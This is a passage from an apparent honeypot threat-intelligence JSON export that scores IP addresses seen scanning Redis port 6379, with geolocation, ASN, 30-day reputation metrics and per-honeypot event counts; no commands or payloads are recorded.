      "threat_score": 67.1,
      "threat_level": "high",
      "score_components": {
        "frequency": 17.1,
        "persistence": 25,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 51,
        "days_active_30d": 30,
        "ports_targeted_30d": 50,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T08:17:42.007000+00:00",
        "last_seen_30d": "2026-03-31T10:28:25.735000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 51
      }
    },
    "18.218.118.203": {
      "attack_count": 368,
      "first_seen": "2026-03-02T05:11:57.000Z",
      "last_seen": "2026-03-10T11:00:39.649Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Columbus",
      "asn": 16509,
      "as_org": "Amazon.com, Inc.",
      "threat_score": 100,
      "threat_level": "critical",
      "score_components": {
        "frequency": 30,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 12357,
        "days_active_30d": 30,
        "ports_targeted_30d": 176,
        "honeypots_triggered_30d": 14,
        "first_seen_30d": "2026-03-02T03:14:31+00:00",
        "last_seen_30d": "2026-03-31T22:10:12.064000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 8002,
        "Honeytrap": 3565,
        "Cowrie": 235,
        "Dionaea": 192,
        "ConPot": 114,
        "Redishoneypot": 99,
        "Mailoney": 83,
        "Ipphoney": 22,
        "Honeyaml": 16,
        "ElasticPot": 11,
        "CitrixHoneypot": 7,
        "Tanner": 7,
        "Ciscoasa": 2,
        "H0neytr4p": 2
      }
    },
    "122.191.115.237": {
      "attack_count": 215,
      "first_seen": "2026-03-11T10:29:50.000Z",
      "last_seen": "2026-03-31T15:10:33.236Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4837,
      "as_org": "CHINA UNICOM China169 Backbone",
      "threat_score": 47.0,
      "threat_level": "medium",
      "score_components": {
        "frequency": 17.5,
        "persistence": 17.5,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 56,
        "days_active_30d": 21,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-11T10:29:51+00:00",
        "last_seen_30d": "2026-03-31T15:10:33.236000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 35,
        "Redishoneypot": 21
      }
    },
    "3.131.220.121": {
      "attack_count": 198,
      "first_seen": "2026-03-17T05:08:50.000Z",
      "last_seen": "2026-03-30T04:28:50.984Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Columbus",
      "asn": 16509,
      "as_org": "Amazon.com, Inc.",
      "threat_score": 100,
      "threat_level": "critical",
      "score_components": {
        "frequency": 30,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 7629,
        "days_active_30d": 30,
        "ports_targeted_30d": 171,
        "honeypots_triggered_30d": 14,
        "first_seen_30d": "2026-03-02T03:25:57+00:00",
        "last_seen_30d": "2026-03-31T19:54:22.356000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 4899,
        "Honeytrap": 2142,
        "Cowrie": 162,
        "Mailoney": 153,
        "Dionaea": 124,
        "ConPot": 60,
        "Redishoneypot": 53,
        "Ciscoasa": 10,
        "Honeyaml": 6,
        "Ipphoney": 6,
        "ElasticPot": 5,
        "CitrixHoneypot": 4,
        "Tanner": 3,
        "H0neytr4p": 2
      }
    },
    "167.99.141.235": {
      "attack_count": 91,
      "first_seen": "2026-03-05T16:46:55.000Z",
      "last_seen": "2026-03-14T12:37:48.638Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Germany",
      "country_code": "DE",
      "city": "Frankfurt am Main",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 57.5,
      "threat_level": "medium",
      "score_components": {
        "frequency": 30,
        "persistence": 15.8,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.63
      },
      "reputation_metrics": {
        "total_events_30d": 460984,
        "days_active_30d": 19,
        "ports_targeted_30d": 67801,
        "honeypots_triggered_30d": 18,
        "first_seen_30d": "2026-03-02T00:00:47.831000+00:00",
        "last_seen_30d": "2026-03-20T17:07:53.471000+00:00",
        "days_since_last_seen": 11
      },
      "honeypot_breakdown_30d": {
        "Suricata": 280692,
        "Honeytrap": 179507,
        "Cowrie": 621,
        "Dionaea": 44,
        "Miniprint": 35,
        "Redishoneypot": 21,
        "ConPot": 17,
        "Adbhoney": 10,
        "Dicompot": 7,
        "Tanner": 7,
        "H0neytr4p": 5,
        "Honeyaml": 4,
        "ElasticPot": 3,
        "Ciscoasa": 2,
        "Ipphoney": 2,
        "Sentrypeer": 2,
        "Medpot": 1
      }
    },
    "65.49.20.66": {
      "attack_count": 78,
      "first_seen": "2026-03-12T13:21:53.000Z",
      "last_seen": "2026-03-24T15:10:59.110Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 95.8,
      "threat_level": "critical",
      "score_components": {
        "frequency": 25.8,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 384,
        "days_active_30d": 30,
        "ports_targeted_30d": 82,
        "honeypots_triggered_30d": 6,
        "first_seen_30d": "2026-03-02T04:18:24+00:00",
        "last_seen_30d": "2026-03-31T11:42:05.620000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 204,
        "Honeytrap": 137,
        "Redishoneypot": 33,
        "Dionaea": 5,
        "ConPot": 4,
        "Miniprint": 1
      }
    },
    "218.59.175.217": {
      "attack_count": 68,
      "first_seen": "2026-03-02T20:52:24.000Z",
      "last_seen": "2026-03-30T11:19:28.645Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4837,
      "as_org": "CHINA UNICOM China169 Backbone",
      "threat_score": 47.9,
      "threat_level": "medium",
      "score_components": {
        "frequency": 13.4,
        "persistence": 24.2,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 22,
        "days_active_30d": 29,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-02T20:52:24+00:00",
        "last_seen_30d": "2026-03-30T11:19:28.645000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 12,
        "Suricata": 10
      }
    },
    "114.80.35.241": {
      "attack_count": 65,
      "first_seen": "2026-03-04T06:04:56.000Z",
      "last_seen": "2026-03-31T12:27:42.080Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Shanghai",
      "asn": 4811,
      "as_org": "China Telecom Group",
      "threat_score": 41.5,
      "threat_level": "medium",
      "score_components": {
        "frequency": 11.1,
        "persistence": 23.3,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 13,
        "days_active_30d": 28,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-04T06:06:07.514000+00:00",
        "last_seen_30d": "2026-03-31T12:27:42.080000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 13
      }
    },
    "45.82.78.106": {
      "attack_count": 48,
      "first_seen": "2026-03-31T10:30:29.000Z",
      "last_seen": "2026-03-31T10:31:49.805Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Germany",
      "country_code": "DE",
      "city": null,
      "asn": 212512,
      "as_org": "Detai Prosperous Technologies Limited",
      "threat_score": 92.9,
      "threat_level": "critical",
      "score_components": {
        "frequency": 27.9,
        "persistence": 25,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 616,
        "days_active_30d": 30,
        "ports_targeted_30d": 71,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-02T04:50:02+00:00",
        "last_seen_30d": "2026-03-31T23:03:17.440000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 324,
        "Honeytrap": 264,
        "Dionaea": 15,
        "Redishoneypot": 13
      }
    },
    "182.92.181.218": {
      "attack_count": 47,
      "first_seen": "2026-03-03T16:21:18.000Z",
      "last_seen": "2026-03-27T01:05:16.626Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Beijing",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 39.3,
      "threat_level": "low",
      "score_components": {
        "frequency": 12.6,
        "persistence": 20.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.87
      },
      "reputation_metrics": {
        "total_events_30d": 18,
        "days_active_30d": 25,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-03T16:22:25.819000+00:00",
        "last_seen_30d": "2026-03-27T01:05:16.626000+00:00",
        "days_since_last_seen": 4
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 12,
        "Suricata": 6
      }
    },
    "185.107.80.93": {
      "attack_count": 46,
      "first_seen": "2026-03-09T06:48:14.000Z",
      "last_seen": "2026-03-25T07:11:06.774Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "France",
      "country_code": "FR",
      "city": "Ouistreham",
      "asn": 43350,
      "as_org": "NForce Entertainment B.V.",
      "threat_score": 88.7,
      "threat_level": "critical",
      "score_components": {
        "frequency": 24.5,
        "persistence": 19.2,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 281,
        "days_active_30d": 23,
        "ports_targeted_30d": 20,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-09T02:22:19.529000+00:00",
        "last_seen_30d": "2026-03-31T11:59:53.653000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 199,
        "Honeytrap": 62,
        "Cowrie": 12,
        "Redishoneypot": 6,
        "Dionaea": 2
      }
    },
    "64.23.182.67": {
      "attack_count": 46,
      "first_seen": "2026-03-03T08:57:13.000Z",
      "last_seen": "2026-03-19T03:37:43.142Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Santa Clara",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 23.5,
      "threat_level": "low",
      "score_components": {
        "frequency": 13.0,
        "persistence": 14.2,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.6
      },
      "reputation_metrics": {
        "total_events_30d": 20,
        "days_active_30d": 17,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-03T08:57:13+00:00",
        "last_seen_30d": "2026-03-19T03:37:43.142000+00:00",
        "days_since_last_seen": 12
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 15,
        "Suricata": 5
      }
    },
    "47.86.176.209": {
      "attack_count": 39,
      "first_seen": "2026-03-14T16:38:08.000Z",
      "last_seen": "2026-03-14T16:40:24.526Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Hong Kong",
      "country_code": "HK",
      "city": "Hong Kong",
      "asn": 45102,
      "as_org": "Alibaba US Technology Co., Ltd.",
      "threat_score": 12.0,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 14.8,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.43
      },
      "reputation_metrics": {
        "total_events_30d": 30,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-14T16:38:19+00:00",
        "last_seen_30d": "2026-03-14T16:40:24.526000+00:00",
        "days_since_last_seen": 17
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 28,
        "Suricata": 2
      }
    },
    "47.120.36.3": {
      "attack_count": 38,
      "first_seen": "2026-03-08T00:36:47.000Z",
      "last_seen": "2026-03-08T00:40:54.576Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Shenzhen",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 8.4,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 16.1,
        "persistence": 0.8,
        "diversity": 4,
        "spread": 15,
        "recency_factor": 0.23
      },
      "reputation_metrics": {
        "total_events_30d": 41,
        "days_active_30d": 1,
        "ports_targeted_30d": 2,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-08T00:36:48+00:00",
        "last_seen_30d": "2026-03-08T00:40:54.576000+00:00",
        "days_since_last_seen": 23
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 32,
        "Suricata": 5,
        "Cowrie": 4
      }
    },
    "71.6.232.30": {
      "attack_count": 37,
      "first_seen": "2026-03-04T11:47:04.000Z",
      "last_seen": "2026-03-25T13:39:49.055Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 10439,
      "as_org": "CariNet, Inc.",
      "threat_score": 88.7,
      "threat_level": "critical",
      "score_components": {
        "frequency": 18.7,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 74,
        "days_active_30d": 30,
        "ports_targeted_30d": 19,
        "honeypots_triggered_30d": 6,
        "first_seen_30d": "2026-03-02T06:53:10+00:00",
        "last_seen_30d": "2026-03-31T22:03:55.797000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 46,
        "Redishoneypot": 12,
        "Cowrie": 6,
        "Dionaea": 4,
        "Honeytrap": 4,
        "Tanner": 2
      }
    },
    "115.190.97.5": {
      "attack_count": 36,
      "first_seen": "2026-03-03T16:19:44.000Z",
      "last_seen": "2026-03-29T11:16:47.079Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 137718,
      "as_org": "Beijing Volcano Engine Technology Co., Ltd.",
      "threat_score": 35.4,
      "threat_level": "low",
      "score_components": {
        "frequency": 8.5,
        "persistence": 22.5,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.93
      },
      "reputation_metrics": {
        "total_events_30d": 7,
        "days_active_30d": 27,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-03T16:20:48.276000+00:00",
        "last_seen_30d": "2026-03-29T11:16:47.079000+00:00",
        "days_since_last_seen": 2
      },
      "honeypot_breakdown_30d": {
        "Suricata": 7
      }
    },
    "103.236.67.106": {
      "attack_count": 35,
      "first_seen": "2026-03-05T12:57:23.000Z",
      "last_seen": "2026-03-05T12:59:57.377Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4816,
      "as_org": "China Telecom Group",
      "threat_score": 3.7,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 14.8,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.13
      },
      "reputation_metrics": {
        "total_events_30d": 30,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-05T12:57:23+00:00",
        "last_seen_30d": "2026-03-05T12:59:57.377000+00:00",
        "days_since_last_seen": 26
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 28,
        "Suricata": 2
      }
    },
    "14.103.220.97": {
      "attack_count": 35,
      "first_seen": "2026-03-03T13:29:02.000Z",
      "last_seen": "2026-03-31T01:28:57.198Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4811,
      "as_org": "China Telecom Group",
      "threat_score": 39.6,
      "threat_level": "low",
      "score_components": {
        "frequency": 8.5,
        "persistence": 24.2,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 7,
        "days_active_30d": 29,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-03T13:30:11.429000+00:00",
        "last_seen_30d": "2026-03-31T01:28:57.198000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 7
      }
    },
    "221.130.29.85": {
      "attack_count": 29,
      "first_seen": "2026-03-02T08:06:23.000Z",
      "last_seen": "2026-03-26T09:19:14.103Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 56046,
      "as_org": "China Mobile communications corporation",
      "threat_score": 62.8,
      "threat_level": "high",
      "score_components": {
        "frequency": 16.8,
        "persistence": 25,
        "diversity": 6,
        "spread": 15,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 48,
        "days_active_30d": 30,
        "ports_targeted_30d": 3,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-02T08:06:23+00:00",
        "last_seen_30d": "2026-03-31T18:17:45.985000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 33,
        "Redishoneypot": 9,
        "Honeytrap": 6
      }
    },
    "34.135.208.93": {
      "attack_count": 29,
      "first_seen": "2026-03-31T08:29:20.000Z",
      "last_seen": "2026-03-31T19:22:48.086Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Council Bluffs",
      "asn": 396982,
      "as_org": "Google LLC",
      "threat_score": 24.6,
      "threat_level": "low",
      "score_components": {
        "frequency": 11.8,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 15,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-31T08:30:27.155000+00:00",
        "last_seen_30d": "2026-03-31T19:22:48.086000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 12,
        "Suricata": 3
      }
    },
    "216.180.246.234": {
      "attack_count": 28,
      "first_seen": "2026-03-11T04:56:42.000Z",
      "last_seen": "2026-03-11T05:05:25.487Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 396982,
      "as_org": "Google LLC",
      "threat_score": 24.6,
      "threat_level": "low",
      "score_components": {
        "frequency": 19.1,
        "persistence": 5.0,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.5
      },
      "reputation_metrics": {
        "total_events_30d": 82,
        "days_active_30d": 6,
        "ports_targeted_30d": 21,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-11T04:24:53.852000+00:00",
        "last_seen_30d": "2026-03-16T12:40:05.817000+00:00",
        "days_since_last_seen": 15
      },
      "honeypot_breakdown_30d": {
        "Suricata": 82
      }
    },
    "47.96.228.248": {
      "attack_count": 28,
      "first_seen": "2026-03-06T15:12:42.000Z",
      "last_seen": "2026-03-25T17:13:56.953Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Hangzhou",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 42.2,
      "threat_level": "medium",
      "score_components": {
        "frequency": 15.1,
        "persistence": 16.7,
        "diversity": 6,
        "spread": 15,
        "recency_factor": 0.8
      },
      "reputation_metrics": {
        "total_events_30d": 32,
        "days_active_30d": 20,
        "ports_targeted_30d": 3,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-06T15:12:42+00:00",
        "last_seen_30d": "2026-03-25T17:13:56.953000+00:00",
        "days_since_last_seen": 6
      },
      "honeypot_breakdown_30d": {
        "Suricata": 19,
        "Redishoneypot": 9,
        "Honeytrap": 4
      }
    },
    "65.49.1.80": {
      "attack_count": 28,
      "first_seen": "2026-03-03T09:28:09.000Z",
      "last_seen": "2026-03-03T09:29:55.265Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 96.2,
      "threat_level": "critical",
      "score_components": {
        "frequency": 26.2,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 417,
        "days_active_30d": 30,
        "ports_targeted_30d": 83,
        "honeypots_triggered_30d": 10,
        "first_seen_30d": "2026-03-02T01:48:45+00:00",
        "last_seen_30d": "2026-03-31T13:44:24.945000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 266,
        "Honeytrap": 89,
        "Ciscoasa": 24,
        "Redishoneypot": 11,
        "Cowrie": 9,
        "H0neytr4p": 8,
        "Adbhoney": 4,
        "ConPot": 3,
        "Honeyaml": 2,
        "Ipphoney": 1
      }
    },
    "158.173.21.216": {
      "attack_count": 27,
      "first_seen": "2026-03-15T00:22:47.000Z",
      "last_seen": "2026-03-15T13:01:31.100Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "The Netherlands",
      "country_code": "NL",
      "city": "Amsterdam",
      "asn": 212238,
      "as_org": "Datacamp Limited",
      "threat_score": 28.3,
      "threat_level": "low",
      "score_components": {
        "frequency": 16.7,
        "persistence": 0.8,
        "diversity": 18,
        "spread": 25,
        "recency_factor": 0.47
      },
      "reputation_metrics": {
        "total_events_30d": 47,
        "days_active_30d": 1,
        "ports_targeted_30d": 9,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-15T00:22:43+00:00",
        "last_seen_30d": "2026-03-15T13:01:31.100000+00:00",
        "days_since_last_seen": 16
      },
      "honeypot_breakdown_30d": {
        "Suricata": 26,
        "Honeytrap": 9,
        "Redishoneypot": 9,
        "ElasticPot": 2,
        "Dionaea": 1
      }
    },
    "106.227.11.236": {
      "attack_count": 26,
      "first_seen": "2026-03-02T03:35:36.000Z",
      "last_seen": "2026-03-19T22:00:21.416Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 134238,
      "as_org": "CHINANET Jiangx province IDC network",
      "threat_score": 17.4,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 7.0,
        "persistence": 15.0,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.6
      },
      "reputation_metrics": {
        "total_events_30d": 5,
        "days_active_30d": 18,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T03:36:42.786000+00:00",
        "last_seen_30d": "2026-03-19T22:00:21.416000+00:00",
        "days_since_last_seen": 12
      },
      "honeypot_breakdown_30d": {
        "Suricata": 5
      }
    },
    "47.103.36.53": {
      "attack_count": 26,
      "first_seen": "2026-03-17T18:41:03.000Z",
      "last_seen": "2026-03-17T18:42:17.785Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Shanghai",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 38.9,
      "threat_level": "low",
      "score_components": {
        "frequency": 16.9,
        "persistence": 10.8,
        "diversity": 4,
        "spread": 15,
        "recency_factor": 0.83
      },
      "reputation_metrics": {
        "total_events_30d": 49,
        "days_active_30d": 13,
        "ports_targeted_30d": 2,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-14T04:29:49.128000+00:00",
        "last_seen_30d": "2026-03-26T22:40:19.266000+00:00",
        "days_since_last_seen": 5
      },
      "honeypot_breakdown_30d": {
        "Suricata": 27,
        "Dionaea": 16,
        "Redishoneypot": 6
      }
    },
    "64.62.197.227": {
      "attack_count": 26,
      "first_seen": "2026-03-17T12:33:33.000Z",
      "last_seen": "2026-03-17T12:35:13.248Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 94.9,
      "threat_level": "critical",
      "score_components": {
        "frequency": 24.9,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 307,
        "days_active_30d": 30,
        "ports_targeted_30d": 69,
        "honeypots_triggered_30d": 13,
        "first_seen_30d": "2026-03-02T04:06:35+00:00",
        "last_seen_30d": "2026-03-31T06:38:14.709000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 186,
        "Honeytrap": 61,
        "Cowrie": 16,
        "Redishoneypot": 11,
        "H0neytr4p": 8,
        "Mailoney": 6,
        "Tanner": 6,
        "ConPot": 4,
        "Dionaea": 3,
        "Adbhoney": 2,
        "ElasticPot": 2,
        "Ipphoney": 1,
        "Miniprint": 1
      }
    },
    "160.22.254.250": {
      "attack_count": 25,
      "first_seen": "2026-03-06T09:01:28.000Z",
      "last_seen": "2026-03-17T17:49:39.537Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "India",
      "country_code": "IN",
      "city": "Deoghar",
      "asn": 133311,
      "as_org": "SUBHX INFOTECH OPC PRIVATE LIMITED",
      "threat_score": 16.2,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 8.5,
        "persistence": 10.0,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.53
      },
      "reputation_metrics": {
        "total_events_30d": 7,
        "days_active_30d": 12,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-06T09:02:44.011000+00:00",
        "last_seen_30d": "2026-03-17T17:49:39.537000+00:00",
        "days_since_last_seen": 14
      },
      "honeypot_breakdown_30d": {
        "Suricata": 4,
        "Redishoneypot": 3
      }
    },
    "209.38.92.228": {
      "attack_count": 25,
      "first_seen": "2026-03-30T09:41:44.000Z",
      "last_seen": "2026-03-30T09:42:52.966Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Australia",
      "country_code": "AU",
      "city": "Sydney",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 70.1,
      "threat_level": "high",
      "score_components": {
        "frequency": 26.7,
        "persistence": 0.8,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 464,
        "days_active_30d": 1,
        "ports_targeted_30d": 37,
        "honeypots_triggered_30d": 8,
        "first_seen_30d": "2026-03-30T09:41:04+00:00",
        "last_seen_30d": "2026-03-30T09:43:31.861000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 287,
        "Honeytrap": 125,
        "Cowrie": 17,
        "ConPot": 12,
        "Redishoneypot": 9,
        "Dionaea": 6,
        "ElasticPot": 4,
        "Mailoney": 4
      }
    },
    "106.13.45.232": {
      "attack_count": 21,
      "first_seen": "2026-03-06T05:00:39.000Z",
      "last_seen": "2026-03-31T21:50:02.644Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 38365,
      "as_org": "Beijing Baidu Netcom Science and Technology Co., Ltd.",
      "threat_score": 34.7,
      "threat_level": "low",
